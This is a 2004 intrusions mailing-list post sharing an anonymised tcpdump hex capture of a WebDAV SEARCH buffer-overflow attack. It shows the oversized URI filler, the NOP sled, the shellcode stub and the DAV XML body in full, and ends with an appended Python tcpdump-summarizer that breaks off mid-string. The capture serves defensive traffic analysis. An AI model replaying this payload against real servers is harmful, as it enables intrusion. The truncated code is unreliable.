RE: Excessively large URI attacks: msg#00043

security.intrusions

Subject: RE: Excessively large URI attacks



Donald wrote Thursday, May 06, 2004 19:03

> Got more packets:-)
> A 1/2 dozen or so all from the same attack would be helpful.

Here's what should be a complete one-sided capture of what looks very
similar to the stuff Bruce Platt posted. Whatever it is, it likes to hammer
on the same address for hours on end.

It does not send a short test SEARCH request like the majority of tools and
worms I saw last year did - anything that ACKs on TCP 80 gets the exploit
right away. It uses flags that confuse me a little - no flags besides ACK
for most, a FIN between the overflow and the payload, and PSH only on the
final packet.

Source, target, and HTTP Host address changed. Shell code at the end.

20:39:29.944203 IP (tos 0x0, ttl 113, id 48428, len 48) 0.0.0.1.2333 >
10.0.0.1.80: S [tcp sum ok] 1909416685:1909416685(0) win 64240 <mss
1460,nop,nop,sackOK> (DF)
0x0000 4500 0030 bd2c 4000 7106 b991 0000 0001 E..0.,@.q...B.<+
0x0010 0a00 0001 091d 0050 71cf 62ed 0000 0000 .......Pq.b.....
0x0020 7002 faf0 16fb 0000 0204 05b4 0101 0402 p...............

20:39:30.003412 IP (tos 0x0, ttl 113, id 48458, len 40) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 1909416686:1909416686(0) ack 3471828372 win
64240 (DF)
0x0000 4500 0028 bd4a 4000 7106 b97b 0000 0001 E..(.J@.q..{B.<+
0x0010 0a00 0001 091d 0050 71cf 62ee ceef e594 .......Pq.b.....
0x0020 5010 faf0 8f2a 0000 0000 1c54 9697 P....*.....T..

20:39:30.179802 IP (tos 0x0, ttl 113, id 48515, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 0:1460(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc bd83 4000 7106 b38e 0000 0001 E.....@.q...B.<+
0x0010 0a00 0001 091d 0050 71cf 62ee ceef e594 .......Pq.b.....
0x0020 5010 faf0 b4c5 0000 5345 4152 4348 202f P.......SEARCH./
0x0030 9002 b102 b102 b102 b102 b102 b102 b102 ................
0x0040 b102 b102 b102 b102 b102 b102 b102 b102 ................
... (all b102)
0x05d0 b102 b102 b102 b102 b102 b102 ............

20:39:30.219277 IP (tos 0x0, ttl 113, id 48516, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 1460:2920(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc bd84 4000 7106 b38d 0000 0001 E.....@.q...B.<+
0x0010 0a00 0001 091d 0050 71cf 68a2 ceef e594 .......Pq.h.....
0x0020 5010 faf0 eaef 0000 b102 b102 b102 b102 P...............
0x0030 b102 b102 b102 b102 b102 b102 b102 b102 ................
... (all b102)
0x02d0 b102 b102 b102 b102 b102 b102 b102 b102 ................
0x02e0 b102 b190 9090 9090 9090 9090 9090 9090 ................
0x02f0 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:30.333308 IP (tos 0x0, ttl 113, id 48546, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 2920:4380(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc bda2 4000 7106 b36f 0000 0001 E.....@.q..oB.<+
0x0010 0a00 0001 091d 0050 71cf 6e56 ceef e594 .......Pq.nV....
0x0020 5010 faf0 41d2 0000 9090 9090 9090 9090 P...A...........
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:30.377706 IP (tos 0x0, ttl 113, id 48547, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 4380:5840(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc bda3 4000 7106 b36e 0000 0001 E.....@.q..nB.<+
0x0010 0a00 0001 091d 0050 71cf 740a ceef e594 .......Pq.t.....
0x0020 5010 faf0 3c1e 0000 9090 9090 9090 9090 P...<...........
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:30.427256 IP (tos 0x0, ttl 113, id 48548, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 5840:7300(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc bda4 4000 7106 b36d 0000 0001 E.....@.q..mB.<+
0x0010 0a00 0001 091d 0050 71cf 79be ceef e594 .......Pq.y.....
0x0020 5010 faf0 366a 0000 9090 9090 9090 9090 P...6j..........
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:30.655004 IP (tos 0x0, ttl 113, id 48586, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 7300:8760(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc bdca 4000 7106 b347 0000 0001 E.....@.q..GB.<+
0x0010 0a00 0001 091d 0050 71cf 7f72 ceef e594 .......Pq..r....
0x0020 5010 faf0 30b6 0000 9090 9090 9090 9090 P...0...........
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:30.704430 IP (tos 0x0, ttl 113, id 48587, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 8760:10220(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc bdcb 4000 7106 b346 0000 0001 E.....@.q..FB.<+
0x0010 0a00 0001 091d 0050 71cf 8526 ceef e594 .......Pq..&....
0x0020 5010 faf0 2b02 0000 9090 9090 9090 9090 P...+...........
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:30.749093 IP (tos 0x0, ttl 113, id 48588, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 10220:11680(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc bdcc 4000 7106 b345 0000 0001 E.....@.q..EB.<+
0x0010 0a00 0001 091d 0050 71cf 8ada ceef e594 .......Pq.......
0x0020 5010 faf0 254e 0000 9090 9090 9090 9090 P...%N..........
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:30.922257 IP (tos 0x0, ttl 113, id 48648, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 11680:13140(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc be08 4000 7106 b309 0000 0001 E.....@.q...B.<+
0x0010 0a00 0001 091d 0050 71cf 908e ceef e594 .......Pq.......
0x0020 5010 faf0 1f9a 0000 9090 9090 9090 9090 P...............
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:30.966809 IP (tos 0x0, ttl 113, id 48649, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 13140:14600(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc be09 4000 7106 b308 0000 0001 E.....@.q...B.<+
0x0010 0a00 0001 091d 0050 71cf 9642 ceef e594 .......Pq..B....
0x0020 5010 faf0 19e6 0000 9090 9090 9090 9090 P...............
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:31.031191 IP (tos 0x0, ttl 113, id 48674, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 14600:16060(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc be22 4000 7106 b2ef 0000 0001 E...."@.q...B.<+
0x0010 0a00 0001 091d 0050 71cf 9bf6 ceef e594 .......Pq.......
0x0020 5010 faf0 1432 0000 9090 9090 9090 9090 P....2..........
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:31.179754 IP (tos 0x0, ttl 113, id 48723, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 18980:20440(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc be53 4000 7106 b2be 0000 0001 E....S@.q...B.<+
0x0010 0a00 0001 091d 0050 71cf ad12 ceef e594 .......Pq.......
0x0020 5010 faf0 0316 0000 9090 9090 9090 9090 P...............
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:31.229187 IP (tos 0x0, ttl 113, id 48724, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 20440:21900(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc be54 4000 7106 b2bd 0000 0001 E....T@.q...B.<+
0x0010 0a00 0001 091d 0050 71cf b2c6 ceef e594 .......Pq.......
0x0020 5010 faf0 fd61 0000 9090 9090 9090 9090 P....a..........
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:31.303508 IP (tos 0x0, ttl 113, id 48739, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 21900:23360(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc be63 4000 7106 b2ae 0000 0001 E....c@.q...B.<+
0x0010 0a00 0001 091d 0050 71cf b87a ceef e594 .......Pq..z....
0x0020 5010 faf0 f7ad 0000 9090 9090 9090 9090 P...............
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:31.343020 IP (tos 0x0, ttl 113, id 48740, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 23360:24820(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc be64 4000 7106 b2ad 0000 0001 E....d@.q...B.<+
0x0010 0a00 0001 091d 0050 71cf be2e ceef e594 .......Pq.......
0x0020 5010 faf0 f1f9 0000 9090 9090 9090 9090 P...............
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:31.392518 IP (tos 0x0, ttl 113, id 48741, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 24820:26280(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc be65 4000 7106 b2ac 0000 0001 E....e@.q...B.<+
0x0010 0a00 0001 091d 0050 71cf c3e2 ceef e594 .......Pq.......
0x0020 5010 faf0 ec45 0000 9090 9090 9090 9090 P....E..........
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:31.551042 IP (tos 0x0, ttl 113, id 48795, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 26280:27740(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc be9b 4000 7106 b276 0000 0001 E.....@.q..vB.<+
0x0010 0a00 0001 091d 0050 71cf c996 ceef e594 .......Pq.......
0x0020 5010 faf0 e691 0000 9090 9090 9090 9090 P...............
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:31.605445 IP (tos 0x0, ttl 113, id 48798, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 29200:30660(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc be9e 4000 7106 b273 0000 0001 E.....@.q..sB.<+
0x0010 0a00 0001 091d 0050 71cf d4fe ceef e594 .......Pq.......
0x0020 5010 faf0 db29 0000 9090 9090 9090 9090 P....)..........
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:31.669778 IP (tos 0x0, ttl 113, id 48811, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 16060:17520(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc beab 4000 7106 b266 0000 0001 E.....@.q..fB.<+
0x0010 0a00 0001 091d 0050 71cf a1aa ceef e594 .......Pq.......
0x0020 5010 faf0 0e7e 0000 9090 9090 9090 9090 P....~..........
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:31.719253 IP (tos 0x0, ttl 113, id 48813, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 30660:32120(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc bead 4000 7106 b264 0000 0001 E.....@.q..dB.<+
0x0010 0a00 0001 091d 0050 71cf dab2 ceef e594 .......Pq.......
0x0020 5010 faf0 d575 0000 9090 9090 9090 9090 P....u..........
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:31.873316 IP (tos 0x0, ttl 113, id 48848, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 32120:33580(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc bed0 4000 7106 b241 0000 0001 E.....@.q..AB.<+
0x0010 0a00 0001 091d 0050 71cf e066 ceef e594 .......Pq..f....
0x0020 5010 faf0 cfc1 0000 9090 9090 9090 9090 P...............
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:31.971904 IP (tos 0x0, ttl 113, id 48866, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 33580:35040(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc bee2 4000 7106 b22f 0000 0001 E.....@.q../B.<+
0x0010 0a00 0001 091d 0050 71cf e61a ceef e594 .......Pq.......
0x0020 5010 faf0 ca0d 0000 9090 9090 9090 9090 P...............
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:32.055876 IP (tos 0x0, ttl 113, id 48878, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 35040:36500(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc beee 4000 7106 b223 0000 0001 E.....@.q..#B.<+
0x0010 0a00 0001 091d 0050 71cf ebce ceef e594 .......Pq.......
0x0020 5010 faf0 c459 0000 9090 9090 9090 9090 P....Y..........
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:32.199439 IP (tos 0x0, ttl 113, id 48962, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 17520:18980(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc bf42 4000 7106 b1cf 0000 0001 E....B@.q...B.<+
0x0010 0a00 0001 091d 0050 71cf a75e ceef e594 .......Pq..^....
0x0020 5010 faf0 08ca 0000 9090 9090 9090 9090 P...............
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:32.248936 IP (tos 0x0, ttl 113, id 48963, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 27740:29200(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc bf43 4000 7106 b1ce 0000 0001 E....C@.q...B.<+
0x0010 0a00 0001 091d 0050 71cf cf4a ceef e594 .......Pq..J....
0x0020 5010 faf0 e0dd 0000 9090 9090 9090 9090 P...............
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:32.407340 IP (tos 0x0, ttl 113, id 48974, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 37960:39420(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc bf4e 4000 7106 b1c3 0000 0001 E....N@.q...B.<+
0x0010 0a00 0001 091d 0050 71cf f736 ceef e594 .......Pq..6....
0x0020 5010 faf0 b8f1 0000 9090 9090 9090 9090 P...............
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:32.615242 IP (tos 0x0, ttl 113, id 49074, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 39420:40880(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc bfb2 4000 7106 b15f 0000 0001 E.....@.q.._B.<+
0x0010 0a00 0001 091d 0050 71cf fcea ceef e594 .......Pq.......
0x0020 5010 faf0 b33d 0000 9090 9090 9090 9090 P....=..........
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:32.932173 IP (tos 0x0, ttl 113, id 49112, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 40880:42340(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc bfd8 4000 7106 b139 0000 0001 E.....@.q..9B.<+
0x0010 0a00 0001 091d 0050 71d0 029e ceef e594 .......Pq.......
0x0020 5010 faf0 ad89 0000 9090 9090 9090 9090 P...............
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:33.293549 IP (tos 0x0, ttl 113, id 49194, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 36500:37960(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc c02a 4000 7106 b0e7 0000 0001 E....*@.q...B.<+
0x0010 0a00 0001 091d 0050 71cf f182 ceef e594 .......Pq.......
0x0020 5010 faf0 bea5 0000 9090 9090 9090 9090 P...............
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:33.580546 IP (tos 0x0, ttl 113, id 49281, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 42340:43800(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc c081 4000 7106 b090 0000 0001 E.....@.q...B.<+
0x0010 0a00 0001 091d 0050 71d0 0852 ceef e594 .......Pq..R....
0x0020 5010 faf0 a7d5 0000 9090 9090 9090 9090 P...............
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:33.629984 IP (tos 0x0, ttl 113, id 49282, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 43800:45260(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc c082 4000 7106 b08f 0000 0001 E.....@.q...B.<+
0x0010 0a00 0001 091d 0050 71d0 0e06 ceef e594 .......Pq.......
0x0020 5010 faf0 a221 0000 9090 9090 9090 9090 P....!..........
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:33.892442 IP (tos 0x0, ttl 113, id 49340, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 45260:46720(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc c0bc 4000 7106 b055 0000 0001 E.....@.q..UB.<+
0x0010 0a00 0001 091d 0050 71d0 13ba ceef e594 .......Pq.......
0x0020 5010 faf0 9c6d 0000 9090 9090 9090 9090 P....m..........
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:33.961651 IP (tos 0x0, ttl 113, id 49352, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 46720:48180(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc c0c8 4000 7106 b049 0000 0001 E.....@.q..IB.<+
0x0010 0a00 0001 091d 0050 71d0 196e ceef e594 .......Pq..n....
0x0020 5010 faf0 96b9 0000 9090 9090 9090 9090 P...............
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:34.144832 IP (tos 0x0, ttl 113, id 49437, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 48180:49640(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc c11d 4000 7106 aff4 0000 0001 E.....@.q...B.<+
0x0010 0a00 0001 091d 0050 71d0 1f22 ceef e594 .......Pq.."....
0x0020 5010 faf0 9105 0000 9090 9090 9090 9090 P...............
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:34.199237 IP (tos 0x0, ttl 113, id 49438, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 49640:51100(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc c11e 4000 7106 aff3 0000 0001 E.....@.q...B.<+
0x0010 0a00 0001 091d 0050 71d0 24d6 ceef e594 .......Pq.$.....
0x0020 5010 faf0 8b51 0000 9090 9090 9090 9090 P....Q..........
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:34.238863 IP (tos 0x0, ttl 113, id 49439, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 51100:52560(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc c11f 4000 7106 aff2 0000 0001 E.....@.q...B.<+
0x0010 0a00 0001 091d 0050 71d0 2a8a ceef e594 .......Pq.*.....
0x0020 5010 faf0 859d 0000 9090 9090 9090 9090 P...............
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:34.432526 IP (tos 0x0, ttl 113, id 49520, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 52560:54020(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc c170 4000 7106 afa1 0000 0001 E....p@.q...B.<+
0x0010 0a00 0001 091d 0050 71d0 303e ceef e594 .......Pq.0>....
0x0020 5010 faf0 7fe9 0000 9090 9090 9090 9090 P...............
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:34.481399 IP (tos 0x0, ttl 113, id 49521, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 54020:55480(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc c171 4000 7106 afa0 0000 0001 E....q@.q...B.<+
0x0010 0a00 0001 091d 0050 71d0 35f2 ceef e594 .......Pq.5.....
0x0020 5010 faf0 7a35 0000 9090 9090 9090 9090 P...z5..........
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:34.615104 IP (tos 0x0, ttl 113, id 49570, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 55480:56940(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc c1a2 4000 7106 af6f 0000 0001 E.....@.q..oB.<+
0x0010 0a00 0001 091d 0050 71d0 3ba6 ceef e594 .......Pq.;.....
0x0020 5010 faf0 7481 0000 9090 9090 9090 9090 P...t...........
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:34.748802 IP (tos 0x0, ttl 113, id 49609, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 56940:58400(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc c1c9 4000 7106 af48 0000 0001 E.....@.q..HB.<+
0x0010 0a00 0001 091d 0050 71d0 415a ceef e594 .......Pq.AZ....
0x0020 5010 faf0 6ecd 0000 9090 9090 9090 9090 P...n...........
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:34.793445 IP (tos 0x0, ttl 113, id 49610, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 58400:59860(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc c1ca 4000 7106 af47 0000 0001 E.....@.q..GB.<+
0x0010 0a00 0001 091d 0050 71d0 470e ceef e594 .......Pq.G.....
0x0020 5010 faf0 6919 0000 9090 9090 9090 9090 P...i...........
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:34.847788 IP (tos 0x0, ttl 113, id 49611, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 59860:61320(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc c1cb 4000 7106 af46 0000 0001 E.....@.q..FB.<+
0x0010 0a00 0001 091d 0050 71d0 4cc2 ceef e594 .......Pq.L.....
0x0020 5010 faf0 6365 0000 9090 9090 9090 9090 P...ce..........
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:35.001220 IP (tos 0x0, ttl 113, id 49623, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 61320:62780(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc c1d7 4000 7106 af3a 0000 0001 E.....@.q..:B.<+
0x0010 0a00 0001 091d 0050 71d0 5276 ceef e594 .......Pq.Rv....
0x0020 5010 faf0 5db1 0000 9090 9090 9090 9090 P...]...........
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:35.159656 IP (tos 0x0, ttl 113, id 49670, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 62780:64240(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc c206 4000 7106 af0b 0000 0001 E.....@.q...B.<+
0x0010 0a00 0001 091d 0050 71d0 582a ceef e594 .......Pq.X*....
0x0020 5010 faf0 57fd 0000 9090 9090 9090 9090 P...W...........
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x05d0 9090 9090 9090 9090 9090 9090 ............

20:39:35.159778 IP (tos 0x0, ttl 113, id 49741, len 40) 0.0.0.1.2333 >
10.0.0.1.80: F [tcp sum ok] 67124:67124(0) ack 1 win 64240 (DF)
0x0000 4500 0028 c24d 4000 7106 b478 0000 0001 E..(.M@.q..xB.<+
0x0010 0a00 0001 091d 0050 71d0 6922 ceef e594 .......Pq.i"....
0x0020 5011 faf0 88f4 0000 0000 abba 35ba P...........5.

20:39:35.209117 IP (tos 0x0, ttl 113, id 49671, len 1500) 0.0.0.1.2333 >
10.0.0.1.80: . [tcp sum ok] 64240:65700(1460) ack 1 win 64240 (DF)
0x0000 4500 05dc c207 4000 7106 af0a 0000 0001 E.....@.q...B.<+
0x0010 0a00 0001 091d 0050 71d0 5dde ceef e594 .......Pq.].....
0x0020 5010 faf0 85a6 0000 9090 9090 9090 9090 P...............
0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................
... (all 9090)
0x0520 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0530 9090 9090 908b f932 c0fe c0f2 aeff e720 .......2........
0x0540 4854 5450 2f31 2e31 0d0a 486f 7374 3a20 HTTP/1.1..Host:.
0x0550 3130 2e30 302e 3030 2e30 3031 0d0a 436f 10.00.00.001..Co
0x0560 6e74 656e 742d 5479 7065 3a20 7465 7874 ntent-Type:.text
0x0570 2f78 6d6c 0d0a 436f 6e74 656e 742d 4c65 /xml..Content-Le
0x0580 6e67 7468 3a20 3133 3939 0d0a 0d0a 3c3f ngth:.1399....<?
0x0590 786d 6c20 7665 7273 696f 6e3d 2231 2e30 xml.version="1.0
0x05a0 223f 3e0d 0a3c 673a 7365 6172 6368 7265 "?>..<g:searchre
0x05b0 7175 6573 7420 786d 6c6e 733a 673d 2244 quest.xmlns:g="D
0x05c0 4156 3a22 3e0d 0a3c 673a 7371 6c3e 0d0a AV:">..<g:sql>..
0x05d0 5365 6c65 6374 2022 4441 563a Select."DAV:

20:39:35.268440 IP (tos 0x0, ttl 113, id 49680, len 1464) 0.0.0.1.2333 >
10.0.0.1.80: P [tcp sum ok] 65700:67124(1424) ack 1 win 64240 (DF)
0x0000 4500 05b8 c210 4000 7106 af25 0000 0001 E.....@.q..%B.<+
0x0010 0a00 0001 091d 0050 71d0 6392 ceef e594 .......Pq.c.....
0x0020 5018 faf0 8fa4 0000 6469 7370 6c61 796e P.......displayn
0x0030 616d 6522 2066 726f 6d20 7363 6f70 6528 ame".from.scope(
0x0040 290d 0a3c 2f67 3a73 716c 3e0d 0a3c 2f67 )..</g:sql>..</g
0x0050 3a73 6561 7263 6872 6571 7565 7374 3e0d :searchrequest>.
0x0060 0a01 9090 9090 9090 9090 9090 9090 9090 ................

_______________________________________________
Intrusions mailing list
Intrusions@xxxxxxxxxxxxxx
http://www.dshield.org/mailman/listinfo/intrusions
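
Added example (not part of the original post): a small Python summarizer for tcpdump summary lines in the format shown in the capture, reporting per flow the traits the post describes: where PSH first appears, segments that arrive late, and a FIN seen before all bytes below its sequence number were captured. The sample lines, the addresses and the 4096-byte limit are constructed assumptions.

```python
import re

# tcpdump summary line with the wrapped header rejoined onto one line:
#   src.port > dst.port: FLAGS [tcp sum ok] start:end(len) ack ...
SEG = re.compile(r"(\S+) > (\S+): (\S+) (?:\[[^\]]*\] )?(\d+):(\d+)\((\d+)\)")

# Constructed sample (documentation addresses), shaped like the capture above:
# ACK-only data, one late segment, a FIN ahead of the tail, PSH on the last one.
SAMPLE = """\
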